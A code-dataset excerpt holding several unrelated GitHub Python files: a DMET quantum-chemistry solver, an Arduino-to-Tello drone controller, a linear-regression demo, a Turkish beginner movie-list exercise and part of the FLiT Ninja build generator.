newline=\"\\n \"))\n\n # --- Check input\n if not mf.converged:\n self.log.error(\"Mean-field calculation not converged.\")\n\n self.vcorr = None\n\n self.iteration = 0\n self.cluster_results = {}\n self.results = []\n self.e_dmet = self.e_mf - self.mf.energy_nuc()\n\n self.log.timing(\"Time for DMET setup: %s\", time_string(timer() - t_start))\n\n @property\n def e_tot(self):\n return self.e_mf + self.e_corr\n\n def __repr__(self):\n keys = [\"mf\", \"solver\"]\n fmt = (\"%s(\" + len(keys) * \"%s: %r, \")[:-2] + \")\"\n values = [self.__dict__[k] for k in keys]\n return fmt % (self.__class__.__name__, *[x for y in zip(keys, values) for x in y])\n\n def kernel(self):\n \"\"\"Run DMET calculation.\"\"\"\n t_start = timer()\n\n if self.nfrag == 0:\n raise ValueError(\"No fragments defined for calculation.\")\n\n maxiter = self.opts.maxiter\n # View this as a single number for now.\n if self.opts.bath_options[\"bathtype\"] == \"mp2\" and maxiter > 1:\n raise NotImplementedError(\n \"MP2 bath calculation is currently ignoring the correlation potential, so does\"\n \" not work properly for self-consistent calculations.\"\n )\n\n fock = self.get_fock()\n if self.vcorr is None:\n self.vcorr = np.zeros((self.nao,) * 2)\n else:\n self.log.info(\"Starting from previous correlation potential.\")\n\n cpt = 0.0\n mf = self.mf\n\n sym_parents = self.get_symmetry_parent_fragments()\n sym_children = self.get_symmetry_child_fragments()\n nsym = [len(x) + 1 for x in sym_children]\n\n if not self.opts.mixing_variable == \"hl rdm\":\n raise ValueError(\"Only DIIS extrapolation of the high-level rdms is current implemented.\")\n\n if self.opts.diis:\n self.updater = DIISUpdate()\n else:\n self.updater = MixUpdate(self.opts.mixing_param)\n self.converged = False\n for iteration in range(1, maxiter + 1):\n self.iteration = iteration\n self.log.info(\"Now running iteration %2d\", iteration)\n self.log.info(\"------------------------\")\n if iteration > 1:\n self.reset()\n # For first iteration want to run on provided mean-field state.\n mo_energy, mo_coeff = self.mf.eig(fock + self.vcorr, self.get_ovlp())\n self.update_mf(mo_coeff, mo_energy)\n\n if self.opts.charge_consistent:\n fock = self.get_fock()\n # Need to optimise a global chemical potential to ensure electron number is converged.\n nelec_mf = self._check_fragment_nelectron()\n if type(nelec_mf) == tuple:\n nelec_mf = sum(nelec_mf)\n\n for f in self.get_fragments(sym_parent=None):\n f.make_bath()\n f.make_cluster()\n self.build_screened_eris()\n\n def electron_err(cpt, construct_bath=False):\n err = self.calc_electron_number_defect(cpt, nelec_mf, sym_parents, nsym, construct_bath)\n return err\n\n err = electron_err(cpt, construct_bath=not self.opts.screening)\n\n if abs(err) > self.opts.max_elec_err * nelec_mf:\n # Need to find chemical potential bracket.\n # Error is positive if excess electrons at high-level, and negative if too few electrons at high-level.\n # Changing chemical potential should introduces similar change in high-level electron number, so we want\n # our new chemical potential to be shifted in the opposite direction as electron error.\n new_cpt = cpt - np.sign(err) * 0.1\n # Set this in case of errors later on.\n new_err = err\n try:\n new_err = electron_err(new_cpt)\n except np.linalg.LinAlgError as e:\n if self.solver == \"CCSD\":\n self.log.info(\"Caught DIIS error in CCSD; trying smaller chemical potential deviation.\")\n # Want to end up with 3/4 of current value after multiplied by two.\n new_cpt = cpt - (new_cpt - cpt) * 3 / 8\n else:\n raise e\n if err * new_err > 0: # Check if errors have same sign.\n for ntry in range(10):\n new_cpt = cpt + (new_cpt - cpt) * 2\n try:\n new_err = electron_err(new_cpt)\n except np.linalg.LinAlgError as e:\n if self.solver == \"CCSD\":\n self.log.info(\"Caught DIIS error in CCSD; trying smaller chemical potential deviation.\")\n # Want to end up with 3/4 of current value after multiplied by two.\n new_cpt = cpt - (new_cpt - cpt) * 3 / 8\n else:\n raise e\n if err * new_err < 0:\n break\n else:\n self.log.fatal(\"Could not find chemical potential bracket.\")\n break\n # If we've got to here we've found a bracket.\n [lo, hi] = sorted([cpt, new_cpt])\n cpt, res = scipy.optimize.brentq(\n electron_err, a=lo, b=hi, full_output=True, xtol=self.opts.max_elec_err * nelec_mf\n ) # self.opts.max_elec_err * nelec_mf)\n self.log.info(\"Converged chemical potential: {:6.4e}\".format(cpt))\n # Recalculate to ensure all fragments have up-to-date info. Brentq strangely seems to do an extra\n # calculation at the end...\n electron_err(cpt)\n else:\n self.log.info(\"Previous chemical potential still suitable\")\n\n e1, e2, emf = 0.0, 0.0, 0.0\n for x, frag in enumerate(sym_parents):\n e1_contrib, e2_contrib = frag.results.e1, frag.results.e2\n e1 += e1_contrib * nsym[x]\n e2 += e2_contrib * nsym[x]\n emf += frag.get_fragment_mf_energy() * nsym[x]\n # print(e1 + e2, e1, e2)\n # print(frag.get_fragment_dmet_energy())\n self.e_corr = e1 + e2 - emf\n self.log.info(\"Total DMET energy {:8.4f}\".format(self.e_tot))\n self.log.info(\"Energy Contributions: 1-body={:8.4f}, 2-body={:8.4f}\".format(e1, e2))\n if self.opts.oneshot:\n break\n curr_rdms, delta_rdms = self.updater.update(self.hl_rdms)\n self.log.info(\"Change in high-level RDMs: {:6.4e}\".format(delta_rdms))\n vcorr_new = self.update_vcorr(fock, curr_rdms)\n delta = sum((vcorr_new - self.vcorr).reshape(-1) ** 2) ** (0.5)\n self.log.info(\"Delta Vcorr {:6.4e}\".format(delta))\n if delta < self.opts.conv_tol:\n self.converged = True\n self.log.info(\"DMET converged after %d iterations\" % iteration)\n break\n self.vcorr = vcorr_new\n else:\n self.log.error(\"Self-consistency not reached in {} iterations.\".format(maxiter))\n\n self.print_results()\n\n self.log.info(\"Total wall time: %s\", time_string(timer() - t_start))\n self.log.info(\"All done.\")\n\n def calc_electron_number_defect(self, chempot, nelec_target, parent_fragments, nsym, construct_bath=True):\n self.log.info(\"Running chemical potential={:8.6e}\".format(chempot))\n\n nelec_hl = 0.0\n exit = False\n for x, frag in enumerate(parent_fragments):\n msg = \"Now running %s\" % (frag)\n self.log.info(msg)\n self.log.info(len(msg) * \"-\")\n self.log.changeIndentLevel(1)\n try:\n result = frag.kernel(construct_bath=construct_bath, chempot=chempot)\n except DMETFragmentExit as e:\n exit = True\n self.log.info(\"Exiting %s\", frag)\n self.log.changeIndentLevel(-1)\n raise e\n self.cluster_results[frag.id] = result\n self.log.changeIndentLevel(-1)\n if exit:\n break\n # Project rdm into fragment space; currently in cluster canonical orbitals.\n nelec_hl += frag.get_nelectron_hl() * nsym[x]\n\n self.hl_rdms = [f.get_frag_hl_dm() for f in parent_fragments]\n self.log.info(\n \"Chemical Potential {:8.6e} gives Total electron deviation {:6.4e}\".format(chempot, nelec_hl - nelec_target)\n )\n return nelec_hl - nelec_target\n\n def update_vcorr(self, fock, curr_rdms):\n # Now for the DMET self-consistency!\n self.log.info(\"Now running DMET correlation potential fitting\")\n # Note that we want the total number of electrons, not just in fragments, and that this treats different spin\n # channels separately; for RHF the resultant problems are identical and so can just be solved once.\n # As such need to use the spin-dm, rather than spatial.\n vcorr_new = perform_SDP_fit(\n self.mol.nelec[0], fock, self.get_impurity_coeffs(), [x / 2 for x in curr_rdms], self.get_ovlp(), self.log\n )\n return vcorr_new\n\n def get_impurity_coeffs(self):\n sym_parents = self.get_symmetry_parent_fragments()\n sym_children = self.get_symmetry_child_fragments()\n\n return [[parent.c_frag] + [c.c_frag for c in children] for (parent, children) in zip(sym_parents, sym_children)]\n\n def print_results(self): # , results):\n self.log.info(\"Energies\")\n self.log.info(\"========\")\n fmt = \"%-20s %+16.8f Ha\"\n # for i, frag in enumerate(self.loop()):\n # e_corr = results[\"e_corr\"][i]\n # self.log.output(fmt, 'E(corr)[' + frag.trimmed_name() + ']=', e_corr)\n self.log.output(fmt, \"E(corr)=\", self.e_corr)\n self.log.output(fmt, \"E(MF)=\", self.e_mf)\n self.log.output(fmt, \"E(nuc)=\", self.mol.energy_nuc())\n self.log.output(fmt, \"E(tot)=\", self.e_tot)\n\n def print_clusters(self):\n \"\"\"Print fragments of calculations.\"\"\"\n self.log.info(\"%3s %20s %8s %4s\", \"ID\", \"Name\", \"Solver\", \"Size\")\n for frag in self.loop():\n self.log.info(\"%3d %20s %8s %4d\", frag.id, frag.name, frag.solver, frag.size)\n\n def make_rdm1(self, *args, **kwargs):\n return self.make_rdm1_demo(*args, **kwargs)\n\n def make_rdm2(self, *args, **kwargs):\n return self.make_rdm2_demo(*args, **kwargs)\n\n def get_corrfunc(self, kind, dm1=None, dm2=None, **kwargs):\n if dm1 is None:\n dm1 = self.make_rdm1()\n if dm2 is None:\n dm2 = self.make_rdm2()\n return super().get_corrfunc(kind, dm1=dm1, dm2=dm2, **kwargs)\n\n\nDMET.make_rdm1.__doc__ = DMET.make_rdm1_demo.__doc__\nDMET.make_rdm2.__doc__ = DMET.make_rdm2_demo.__doc__\n\nRDMET = DMET\n","repo_name":"BoothGroup/Vayesta","sub_path":"vayesta/dmet/dmet.py","file_name":"dmet.py","file_ext":"py","file_size_in_byte":12812,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"31"} +{"seq_id":"34988637075","text":"import serial\nfrom time import sleep\nfrom djitellopy import tello\nimport keyboard as kp\n\ndef initTello():\n try:\n me = tello.Tello()\n me.connect()\n print(me.get_battery())\n except:\n print(\"Connection Fail\")\n\n return me\n\ndef initConnection(portNo, baudRate):\n try:\n ser = serial.Serial(portNo, baudRate)\n print(\"Device Connected\")\n return ser\n\n except:\n print(\"Not connected\")\n\n\ndef sendData(se, data, digits):\n myString=\"$\"\n for d in data:\n myString += str(d).zfill(digits) #zfill - will fil the digit since we need 3 digits in this case\n try:\n se.write(myString.encode())\n print(myString)\n except:\n print(\"Data Transmission Failed\")\n\ndef getData(ser):\n data = ser.readline()\n data = data.decode(\"utf-8\")\n data = data.split(\"#\")\n\n dataList = []\n [dataList.append(d) for d in data]\n return dataList[:-1]\n \ndef control(data, me):\n #print(int(data[1]))\n lr, fb, ud, yv = 0,0,0,0\n speed = 70\n \n if int(data[0]) == 130 and int(data[1]) == 129:\n status = \"Listening\"\n \n if int(data[0]) > 130:\n status = \"Move Forward\"\n fb = speed\n\n if int(data[0]) < 130:\n status = \"Move Backward\"\n fb = -speed\n\n if int(data[1]) > 129:\n status = \"Move Right\"\n lr = speed\n\n if int(data[1]) < 129:\n status = \"Move Left\"\n lr = -speed\n\n if kp.is_pressed('q'): me.land(); sleep(1)\n\n if kp.is_pressed('e'): me.takeoff()\n \n return [status,lr, fb, ud, yv]\n\nif __name__ == \"__main__\":\n ser = initConnection(\"COM4\", 9600)\n\n myDrone = initTello()\n while True:\n # Step 1 - Get Data from Arduino\n receiveData = getData(ser)\n\n # Step 2 - Extract Data from Arduino to Determine Motor Direction\n vals = control(receiveData, myDrone)\n\n myDrone.send_rc_control(vals[1], vals[2], vals[3], vals[4])\n\n # sendData(ser,[30,0],4)\n # sleep(1)\n # sendData(ser,[0,0],4)\n # sleep(1)\n\n #print(getData(ser))\n #print(getData(ser)[0])\n\n \n","repo_name":"Captluke2328/TelloDrone_Tutorial","sub_path":"Drone_Controlled_Object_Sound/arduino/NRF_Receive_Data_From_Arduino_to_Python.py","file_name":"NRF_Receive_Data_From_Arduino_to_Python.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2145797536","text":"import numpy as np\r\nimport random as rdm\r\nimport pandas as pd\r\nimport matplotlib.pyplot as pl\r\nfrom sklearn import datasets, linear_model\r\nfrom sklearn.metrics import mean_squared_error, r2_score\r\n\r\n#test\r\n#n = 10000\r\n# Cargas los digitos de prueba\r\n#x = [r for r in range(n)]\r\n#y = [200,300,100,500,1021,1029,665]\r\n#y = [int(rdm.random() * 500) + r * 6 for r in range(n)]\r\n\r\nx = [1,2,3,4,5,6,7]\r\ny = [200,300,100,500,1021,1029,665]\r\n\r\ninfo = pd.DataFrame({'days': x , 'users': y})\r\n\r\ndays = info['days'].values.reshape(-1,1)\r\nuser = info['users'].values.reshape(-1,1)\r\n\r\ndays_train = info['days'].values.reshape(-1,1)#[:-20]\r\ndays_set = info['days'].values.reshape(-1,1)#[-20:]\r\n\r\nuser_train = info['users'].values.reshape(-1,1)#[:-20]\r\nuser_set = info['users'].values.reshape(-1,1)#[-20:]\r\n\r\n#days_train = info['days'].values.reshape(-1,1)[:-5000]\r\n#days_set = info['days'].values.reshape(-1,1)[-5000:]\r\n\r\n#user_train = info['users'].values.reshape(-1,1)[:-5000]\r\n#user_set = info['users'].values.reshape(-1,1)[-5000:]\r\n\r\n#Creo la variable de la regresion lineal\r\nregs = linear_model.LinearRegression()\r\n\r\nregs.fit(days_train,user_train)\r\n\r\ny_predict = regs.predict(days_set)\r\n\r\n# The coefficients\r\nprint(\"Coefficients: \\n\", regs.coef_)\r\n# The mean squared error\r\nprint(\"Mean squared error: %.2f\" % mean_squared_error(user_set, y_predict))\r\n# The coefficient of determination: 1 is perfect prediction\r\nprint(\"Coefficient of determination: %.2f\" % r2_score(user_set, y_predict))\r\n\r\n#pl.scatter(x_train,y_train,color='r')\r\npl.plot(days_set,user_set,'o',color= 'b', label='Usuarios/ dias')\r\npl.plot(days_set,y_predict,color= 'g',label='Regresion')\r\npl.xlabel('Dias de la semana')\r\npl.ylabel('Usuarios')\r\npl.title('Ajuste de datos')\r\npl.grid()\r\npl.legend(loc=4)\r\npl.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"LinkFalcon0921/RegressionLOgistic","sub_path":"base/pll.py","file_name":"pll.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25187191505","text":"\n# try:\n \n# print(12/1)\n \n \n# except ZeroDivisionError:\n# print(\"sayıyı sıfıra bölemezsin\")\n# except TypeError:\n# print(\"int sayı ile string sayıyı toplayamazsın\")\n# except NameError:\n# print(\"syntax hatası\")\n# else:\n# print(\"başaralı\")\n# finally:\n# print(2+5)\n \n\n\n# try:\n# num=int(input(\"sayı : \"))\n# except:\n# print(\"lütfen sayı girin\")\n# else:\n# print(\"Başarılı\")\n# finally:\n# print(\"Ben Buradayım\")\n\n# try:\n# with open(\"movies.txt\",\"r\")as f:\n# print(f.read())\n# except FileNotFoundError:\n# print(\"Böyle bir dosya yok\")\nimport movies\nuser_options=\"\"\"\nFİLM YÖNETİM SİSTEMİ\neklemek için 1\nlistelemek için 2\ndüzenlemek için 3\nsilmek için 4\nçıkış yapmak için 0\n\"\"\"\n\ndef main():\n user_input=input(user_options)\n while user_input != \"0\":\n if user_input == \"1\":\n add_movie()\n user_input=input(user_options)\n elif user_input == \"2\":\n list_movie()\n user_input=input(user_options)\n else:\n print(f\"{user_input}daha tanımlamadım bacım\")\n \n \n \n \ndef add_movie():\n name=input(\"film adı\")\n director=input(\"yönetmen adı\")\n movies.func(name,director)\n \n \ndef list_movie():\n g=movies.func1()\n for j in g:\n p=j[\"name\"]\n t=j[\"director\"]\n print(f\"Film {p}, Yönetmen {t}\")\nmain()","repo_name":"huseyinylcn/PythonDersleri","sub_path":"ders57/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20186287912","text":"from ninja_syntax import as_list, Writer\n\nimport argparse\nimport os\nimport re\nimport subprocess as subp\nimport sys\nfrom itertools import chain\nfrom socket import gethostname\n\ntry:\n import flitutil as util\nexcept ModuleNotFoundError:\n sys.path.append('..')\n import flitutil as util\nimport flitconfig as conf\nimport flit_update\n\nbrief_description = 'Generate Ninja build file for FLiT makefile system'\n\nBUILD_FILENAME = 'build.ninja'\n\ndef populate_parser(parser=None):\n '''\n Parse command-line arguments\n\n >>> populate_parser().parse_args([])\n Namespace(directory='.', quiet=False)\n\n >>> populate_parser().parse_args(['-C', 'my/dir', '-q'])\n Namespace(directory='my/dir', quiet=True)\n\n >>> populate_parser().parse_args(['--directory', 'another/dir', '--quiet'])\n Namespace(directory='another/dir', quiet=True)\n '''\n if parser is None:\n parser = argparse.ArgumentParser()\n parser.description = '''\n Generates a Ninja build file instead of a GNU Makefile for\n performing the FLiT build in a FLiT test directory.\n '''\n parser.add_argument('-C', '--directory', default='.',\n help='The directory to genreate build.ninja')\n parser.add_argument('-q', '--quiet', action='store_true')\n return parser\n\ndef check_output(*args, **kwargs):\n '''\n Wrapper around subprocess.check_output() that returns a str object\n\n >>> check_output(['echo', 'hello there'])\n 'hello there\\\\n'\n '''\n output = subp.check_output(*args, **kwargs)\n return output.decode(encoding='utf-8')\n\ndef variablize(name):\n '''\n Convert the name to a valid variable name\n\n >>> variablize('')\n 'NO_FLAGS'\n\n >>> variablize('-')\n '_'\n\n >>> variablize('----')\n '____'\n\n >>> variablize('-funsafe-math-optimizations')\n '_FUNSAFE_MATH_OPTIMIZATIONS'\n\n >>> variablize('-Ofast -march=32bit')\n '_OFAST__MARCH_32BIT'\n\n >>> variablize('-3')\n '_3'\n\n >>> variablize('-compiler-name=clang++')\n '_COMPILER_NAME_CLANGxx'\n '''\n if name == '':\n return 'NO_FLAGS'\n name = re.sub('[^0-9A-Za-z]', '_',\n name.upper().replace('+', 'x'))\n assert re.match('^[0-9]', name) is None, \\\n 'Error: cannot handle name that starts with a number'\n assert len(name) > 0, 'Error: cannot handle name only made of dashes'\n return name\n\ndef _create_compilation(compiler, optl, switches):\n '''\n Create compilation dictionary for the given compilation\n\n A compilation has:\n\n - id\n - compiler_name\n - binary\n - optl\n - switches\n - cxxflags\n - ldflags\n - target\n - resultsfile\n\n @param compiler (dict(str->str)): a dictionary with keys\n - name\n - binary\n - fixed_compile_flags\n - fixed_link_flags\n @param optl (str): optimization level\n @param switches (str or list(str)): flags under test\n\n >>> compiler = {'name': 'N', 'binary': './N',\n ... 'fixed_compile_flags': 'fc', 'fixed_link_flags': 'fl'}\n >>> c = _create_compilation(compiler, '-O3', '-ffast-math -mavx2')\n >>> c['id']\n 'N_O3_FFAST_MATH__MAVX2'\n >>> c['compiler_name']\n 'N'\n >>> c['binary']\n './N'\n >>> c['optl']\n '-O3'\n >>> c['switches']\n '-ffast-math -mavx2'\n >>> c['cxxflags']\n 'fc'\n >>> c['ldflags']\n 'fl'\n >>> c['target']\n 'bin/N_O3_FFAST_MATH__MAVX2'\n >>> c['resultsfile']\n 'results/N_O3_FFAST_MATH__MAVX2-out'\n '''\n v_compiler_name = variablize(compiler['name'])\n v_optl = variablize(optl)\n v_switches = variablize(switches)\n my_id = v_compiler_name + v_optl + v_switches\n\n compilation = {\n 'id': my_id,\n 'compiler_name': compiler['name'],\n 'binary': compiler['binary'],\n 'optl': optl,\n 'switches': switches,\n 'cxxflags': compiler['fixed_compile_flags'],\n 'ldflags': compiler['fixed_link_flags'],\n 'target': os.path.join('bin', my_id),\n 'resultsfile': os.path.join('results', my_id + '-out'),\n }\n\n return compilation\n\nclass NinjaWriter:\n '''\n Output to a Ninja build file.\n\n The following attributes are available:\n\n - writer: internal output interface implementing:\n - comment()\n - variable()\n - rule()\n - build()\n - newline()\n - prog: executable to run this configure script\n - ninja_required_version: ninja version that is required\n - ninja_gen_deps: dependencies for the build.ninja file\n - configure_args: arguments passed to this script\n - hostname: hostname of the system\n - sources: list of source files\n - cxxflags: c++ compile flags\n - ldflags: c++ link flags\n - compilers: list of compilers with settings\n - gt_compilation: compilation settings for the baseline compilation\n - run_wrapper: executable to wrap test executables when running\n - timing_flags: flags for timing for test executables\n '''\n\n def __init__(self, out, prog=sys.argv[0], arguments=sys.argv[1:]):\n '''\n Initialize Ninja Writer\n\n @param out: output file object with write() function\n @param prog: executable responsible for calling this script\n @param arguments: arguments passed to this script\n '''\n self.writer = Writer(out)\n self.prog = prog\n self.ninja_required_version = '1.3'\n self.ninja_gen_deps = []\n self.configure_args = arguments\n self.hostname = gethostname()\n self.sources = []\n self.flit_sources = [os.path.join(conf.src_dir, 'ALL-FLIT.cpp')]\n self.cxxflags = [\n '-fno-pie',\n '-std=c++11',\n '-I.',\n '-I' + conf.include_dir,\n ]\n self.ldflags = [\n '-lm',\n '-lstdc++',\n ]\n self.compilers = {}\n self.gt_compilation = None\n self.run_wrapper = ''\n self.timing_flags = ''\n self._written_rules = set()\n\n def load_makefile(self, makefile):\n '''\n Load Makefile and extract variables. The variables pulled out are:\n - SOURCE: list of c++ source files\n - CXXFLAGS: c++ compiler flags\n - LDFLAGS: c++ linker flags\n - LDLIBS: c++ libraries to link (e.g., '-lm')\n - RUN_WRAPPER: executable to wrap the running of the test executables\n\n Test of an empty file\n >>> from tempfile import NamedTemporaryFile\n >>> import io\n >>> w = NinjaWriter(io.StringIO())\n\n >>> cxxflags_orig = list(w.cxxflags)\n >>> ldflags_orig = list(w.ldflags)\n\n >>> with NamedTemporaryFile() as makefile_out:\n ... w.load_makefile(makefile_out.name)\n\n >>> w.sources\n []\n >>> w.cxxflags == cxxflags_orig\n True\n >>> w.ldflags == ldflags_orig\n True\n >>> w.run_wrapper\n ''\n\n Test of a simple file\n >>> from tempfile import NamedTemporaryFile\n >>> with io.StringIO() as writer_out:\n ... w = NinjaWriter(writer_out)\n\n >>> cxxflags_orig = list(w.cxxflags)\n >>> ldflags_orig = list(w.ldflags)\n\n >>> with NamedTemporaryFile(mode='w') as makefile_out:\n ... _ = makefile_out.write('SOURCE := a.cpp\\\\n')\n ... _ = makefile_out.write('SOURCE += b.cpp\\\\n')\n ... _ = makefile_out.write('CXXFLAGS = -std=c++11 -Werror\\\\n')\n ... _ = makefile_out.write('LDFLAGS += -L/usr/local/lib64 -L/opt/gcc\\\\n')\n ... _ = makefile_out.write('LDLIBS = -lm\\\\n')\n ... _ = makefile_out.write('RUN_WRAPPER := /usr/bin/echo -ne \\\\n')\n ... makefile_out.flush()\n ... w.load_makefile(makefile_out.name)\n\n >>> w.sources\n ['a.cpp', 'b.cpp']\n >>> w.cxxflags == cxxflags_orig + ['-std=c++11', '-Werror']\n True\n >>> w.ldflags == ldflags_orig + [\n ... '-L/usr/local/lib64', '-L/opt/gcc', '-lm']\n True\n >>> w.run_wrapper\n '/usr/bin/echo -ne'\n '''\n self.ninja_gen_deps.append(makefile)\n makevars = util.extract_make_vars(makefile)\n if 'SOURCE' in makevars: self.sources.extend(sorted(makevars['SOURCE']))\n if 'CXXFLAGS' in makevars: self.cxxflags.extend(makevars['CXXFLAGS'])\n if 'LDFLAGS' in makevars: self.ldflags.extend(makevars['LDFLAGS'])\n if 'LDLIBS' in makevars: self.ldflags.extend(makevars['LDLIBS'])\n if 'RUN_WRAPPER' in makevars:\n self.run_wrapper = ' '.join(makevars['RUN_WRAPPER'])\n\n def load_project_config(self, tomlfile):\n 'Load configuration from flit-config.toml'\n # TODO: write tests\n self.ninja_gen_deps.append(tomlfile)\n projconf = util.load_projconf()\n\n if projconf['run']['enable_mpi']:\n mpi_cxxflags, mpi_ldflags = flit_update.get_mpi_flags()\n self.cxxflags.extend(mpi_cxxflags)\n self.ldflags.extend(mpi_ldflags)\n\n # different compilers link differently for no position independence\n self.compilers = {x['name']: dict(x) for x in projconf['compiler']}\n for compiler in self.compilers.values():\n if compiler['type'] == 'clang':\n compiler['fixed_link_flags'] += ' -nopie'\n if compiler['type'] == 'gcc':\n version = flit_update.get_gcc_compiler_version(compiler['binary'])\n if version.split('.')[0] not in ('4', '5'):\n compiler['fixed_link_flags'] += ' -no-pie'\n\n self.gt_compilation = _create_compilation(\n self.compilers[projconf['ground_truth']['compiler_name']],\n projconf['ground_truth']['optimization_level'],\n projconf['ground_truth']['switches'])\n self.gt_compilation['id'] = 'gt'\n self.gt_compilation['target'] = 'gtrun'\n self.gt_compilation['resultsfile'] = 'ground-truth.csv'\n\n self.dev_compilation = _create_compilation(\n self.compilers[projconf['dev_build']['compiler_name']],\n projconf['dev_build']['optimization_level'],\n projconf['dev_build']['switches'])\n self.dev_compilation['id'] = 'dev'\n self.dev_compilation['target'] = 'devrun'\n self.dev_compilation['resultsfile'] = 'devrun.csv'\n\n if not projconf['run']['timing']:\n self.timing_flags = '--no-timing'\n else:\n self.timing_flags = '--timing-repeats {} --timing-loops {}'.format(\n projconf['run']['timing_repeats'],\n projconf['run']['timing_loops'])\n\n def _cxx_command(self, outdir, cxx, optl, switches, cxxflags, target):\n '''\n Generates a list of pieces that constitutes a compile command for Ninja\n to make a single object file\n\n @param outdir: output directory of object files (e.g., 'obj/gt')\n @param cxx: compiler binary (e.g., 'g++')\n @param optl: optimization level (e.g., '-O2')\n @param switches: switches under test (e.g., '-ffast-math')\n @param cxxflags: other flags not under test (e.g., '-fno-pie')\n @param target: name of the final executable this object file will be a\n part of, without the directory portion (e.g., 'devrun')\n '''\n # TODO: write tests\n command = [\n 'mkdir -p', outdir, '&&',\n cxx, '-c $in -o $out',\n '-MMD -MT $out -MF $out.d',\n optl,\n ]\n command.extend(as_list(switches))\n command.extend(as_list(cxxflags))\n command.extend([\n '$cxxflags',\n '-DFLIT_HOST=\\'\"{}\"\\''.format(self.hostname),\n '-DFLIT_COMPILER=\\'\"{}\"\\''.format(cxx),\n '-DFLIT_OPTL=\\'\"{}\"\\''.format(optl),\n '-DFLIT_SWITCHES=\\'\"{}\"\\''.format(switches),\n '-DFLIT_FILENAME=\\'\"{}\"\\''.format(target),\n ])\n return command\n\n def _link_command(self, cxx, ldflags, outdir=None):\n 'Generate the link command for Ninja files'\n # TODO: write tests\n command = []\n if outdir:\n command.append('mkdir -p {} && ')\n command.extend([cxx, '-o $out $in'])\n command.extend(as_list(ldflags))\n command.append('$ldflags')\n return command\n\n def _write_help(self):\n 'Writes the help target to the ninja build file'\n # TODO: write tests\n self.writer.comment('Print help to the user')\n self.writer.rule(\n 'HELP',\n command=[\n 'echo', '&&',\n 'echo', '\"The following targets are available.\"', '&&',\n 'echo', '&&',\n 'echo', '\" - help ....... Show this help and exit (default target)\"',\n '&&',\n 'echo', '\" - dev ........ Only run the devel compilation to test things out\"',\n '&&',\n 'echo', '\" - gt ......... Compile the gtrun executable\"',\n '&&',\n 'echo', '\" - runbuild ... Build all executables needed for the run target\"',\n '&&',\n 'echo', '\" - run ........ Run all combinations of compilation, results in results/\"',\n '&&',\n 'echo', '\" - clean ...... Clean intermediate files\"',\n '&&',\n 'echo', '\" - veryclean .. Runs clean + removes targets and results\"',\n '&&',\n 'echo', '\" - distclean .. Same as veryclean\"',\n '&&',\n 'echo',\n ],\n description='DISPLAY help')\n self.writer.build('help', 'HELP')\n self.writer.newline()\n\n def _write_clean(self):\n 'Writes the clean targets to the ninja build file'\n # TODO: write tests\n self.writer.comment('Target to clean up')\n self.writer.rule('CLEAN',\n command=['ninja', '-t', 'clean', '&&', 'rm', '-rf', '$toclean'],\n description='CLEANING UP')\n self.writer.newline()\n\n self.writer.build('clean', 'CLEAN', variables={'toclean': ['obj']})\n self.writer.build('veryclean', 'CLEAN',\n variables={'toclean': [\n 'obj', 'results', 'bin', 'devrun', 'gtrun',\n 'ground-truth.csv', 'ground-truth.csv*.dat']})\n self.writer.build('distclean', 'phony', 'veryclean')\n self.writer.newline()\n\n def _try_rule(self, name, *args, **kwargs):\n '''\n Write rule to Ninja file only if _try_rule() was not called for this\n rule already\n '''\n # TODO: write tests\n if name not in self._written_rules:\n self._written_rules.add(name)\n self.writer.rule(name, *args, **kwargs)\n\n def _write_compilation(self, compilation):\n '''\n Writes the compilation to the ninja build file\n\n The compilation is a dictionary with the following keys:\n\n - id: unique identifier for this compilation\n - compiler_name: name of the compiler used\n - binary: name or path of the compiler executable\n - optl: optimization level\n - switches: switches under test\n - cxxflags: other compiler flags (including compiler-specific)\n - target: file path of destination executable\n - ldflags: link flags (including compiler-specific)\n - resultsfile: file path to store results of running\n '''\n # TODO: write tests\n n = self.writer\n\n name = compilation['id']\n compile_rule_name = name + '_cxx'\n link_rule_name = variablize(compilation['compiler_name']) + '_link'\n obj_dir = os.path.join('obj', name)\n\n # TODO: implement a pool for run_tests since it is timing-sensative??\n self._try_rule('run_tests',\n command=[\n 'mkdir -p results &&',\n self.run_wrapper,\n os.path.join('.', '$in'),\n '$timing_flags',\n '-o $out',\n ],\n description='TEST OUTPUT $out')\n n.newline()\n\n self._try_rule(compile_rule_name,\n command=self._cxx_command(\n outdir=obj_dir,\n cxx=compilation['binary'],\n optl=compilation['optl'],\n switches=compilation['switches'],\n cxxflags=compilation['cxxflags'],\n target=os.path.basename(compilation['target'])),\n description='CXX $out',\n depfile='$out.d',\n deps='gcc')\n n.newline()\n\n self._try_rule(link_rule_name,\n command=self._link_command(\n cxx=compilation['binary'],\n ldflags=compilation['ldflags']),\n description='LINK $out')\n n.newline()\n\n n.build(compilation['target'], link_rule_name,\n inputs=[os.path.join(obj_dir, os.path.basename(x) + '.o')\n for x in chain(self.sources, self.flit_sources)])\n n.newline()\n\n for source in chain(self.sources, self.flit_sources):\n n.build(os.path.join(obj_dir, os.path.basename(source) + '.o'),\n compile_rule_name, source)\n n.newline()\n\n n.build(compilation['resultsfile'], 'run_tests', compilation['target'])\n\n\n def write(self):\n 'creates the ninja build file'\n # TODO: write tests\n n = self.writer\n\n n.comment('Autogenerated by Michael Bentley\\'s script')\n n.comment('This file is to build the mfem tests')\n n.newline()\n\n n.variable('ninja_required_version', self.ninja_required_version)\n n.newline()\n\n n.comment('Arguments passed to the configure script:')\n n.variable('configure_args', self.configure_args)\n n.newline()\n\n n.variable('hostname', self.hostname)\n n.newline()\n\n n.variable('cxxflags', self.cxxflags)\n n.variable('ldflags', self.ldflags)\n n.newline()\n\n n.comment('Timing flags for running the tests')\n n.variable('timing_flags', self.timing_flags)\n n.newline()\n\n n.comment('Be able to reconfigure myself if needed')\n n.rule('configure_ninja',\n command=[self.prog, '$configure_args -q'],\n description='UPDATING $out',\n generator=True)\n n.newline()\n\n n.build('build.ninja', 'configure_ninja', 